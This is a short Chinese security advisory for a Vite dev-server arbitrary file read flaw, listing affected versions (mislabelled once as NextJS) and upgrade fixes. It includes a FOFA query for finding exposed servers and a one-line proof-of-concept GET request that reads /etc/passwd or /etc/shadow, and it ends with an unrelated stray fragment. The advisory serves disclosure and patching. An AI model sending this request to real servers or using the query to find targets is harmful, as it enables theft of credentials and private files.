漏洞描述
Vite是一款现代化的前端开发构建工具,它提供了快速的开发服务器和高效的构建能力,广泛应用于Vue.js项目的开发过程中。
由于Vite开发服务器在处理特定URL请求时,没有对请求的路径进行严格的安全检查和限制,导致攻击者可以绕过保护机制,非法访问项目根目录外的敏感文件。攻击者只需在浏览器输入一个URL,就可能会造成源码、SSH密钥、数据库账号、用户数据等目标机器上的任意文件信息泄露。
影响范围
目前受影响的NextJS版本:
6.2.0 <= Vite <= 6.2.2
6.1.0 <= Vite <= 6.1.1
6.0.0 <= Vite <= 6.0.11
5.0.0 <= Vite <= 5.4.14
Vite <= 4.5.9
FOFA
body="/@vite/client"
POC
GET /@fs/etc/passwd?import&raw?? HTTP/1.1(/etc/passwd或者/etc/shadow)
Content-Type: application/json
Host: IP
修复方案
升级Vite版本
- >=6.2.3
- >=6.1.2, <6.2.0
- >=6.0.12, <6.1.0
- >=5.4.15, <6.0.0
- >=4.5.10, <5.0.0
看中美程序员差异。 "从行为面试问题(behavioral questions)看中美程序员差异。")
